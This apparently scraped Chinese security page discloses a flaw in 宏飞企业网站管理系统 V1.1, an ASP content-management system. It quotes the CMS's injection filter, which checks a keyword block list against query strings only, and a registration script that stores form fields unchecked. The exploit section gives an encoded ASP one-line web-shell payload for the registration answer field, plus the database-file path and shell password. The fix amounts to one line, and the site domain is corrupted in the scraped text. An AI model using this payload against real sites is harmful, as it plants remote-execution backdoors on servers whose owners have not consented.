is87_sql.asp <% Dim GetFlag Rem(提交方式) Dim ErrorSql Rem(非法字符) '..略 ErrorSql = "'~;~and~(~)~exec~update~count~*~%~chr~mid~master~truncate~char~declare" Rem(每个敏感字符或者词语请使用半角 "~" 格开) ErrorSql = split(ErrorSql,"~") '..略 If Instr(LCase(Request.QueryString(RequestKey)),ErrorSql(ForI))<>0 Then response.write "<script>alert(""警告:\n请不要尝试非法注入!!"");history.go(-1);</script>" '..略 response.write "<script>alert(""警告:\n请不要尝试非法注入!!"");history.go(-1);</script>" '..略 %>
过滤问题。
HdhCmsTest2cto测试数据 '\member\register_pass.asp <!--#include file="is87_sql.asp"--> <% dim u,i,letters,ip,useradmin,userpassword,userpassword2,sh,zsname,sex,wen,da,gsname,gsadd,youbian,tel,fax,sj,mail,wz,VerifyCode ip=request.servervariables("remote_addr") useradmin=replace(trim(request("useradmin")),"'","") '..略 zsname=request.form("zsname") '..略 rs("userpassword")=md5(request.form("userpassword")) rs("zsname")=zsname rs("sex")=sex Response.Write "<script>alert('恭喜!注册成功,返回首页进行登陆!');window.location.href='/index.asp';</script>" %>
直接写入数据库。
注册会员,密码保护答案:┼攠數畣整爠煥敵瑳∨≡┩>
http://HdhCmsTest2cto测试数据 \data\#is87$cds. asp
密码:a
修复:见上文分析
摘自:0855.tv
查看更多关于宏飞企业网站管理系统V1.1 漏洞及修复 - 网站安全的详细内容...